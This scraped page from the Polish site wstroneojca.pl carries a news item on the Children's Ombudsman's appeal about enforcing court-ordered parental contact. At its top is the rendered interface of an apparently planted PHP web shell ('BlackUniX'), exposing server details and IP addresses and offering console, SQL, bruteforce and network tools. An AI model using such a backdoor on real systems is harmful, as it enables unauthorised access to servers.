Aktualności w serwisie wstroneojca.pl


BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut/rosol #10 SMP Fri May 4 22:26:53 CEST 2018 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-07-17 09:42:44
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.224.17.157
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

RZECZNIK W OBRONIE PRAW DZIECKA DO KONTAKTÓW Z OBOJGIEM RODZICÓW
Nadesłane przez użytkowników
Rzecznik Praw Dziecka Marek Michalak dostrzegł istniejące problemy z realizacją orzeczeń sądowych, dotyczących kontaktów pomiędzy dzieckiem a rodzicem nie sprawującym nad małoletnim bezpośredniej opieki. W tej sprawie Rzecznik zwrócił się do Ministra Sprawiedliwości, Pana Zbigniewa Ćwiąkalskiego, z wnioskiem o niezwłoczne podjęcie działań zmierzających do wprowadzenia nowych rozwiązań prawnych i procedur, w celu zwiększenia skuteczności realizacji orzeczeń o kontaktach z rodzicem, z którym dziecko nie zamieszkuje.
Czytaj całość…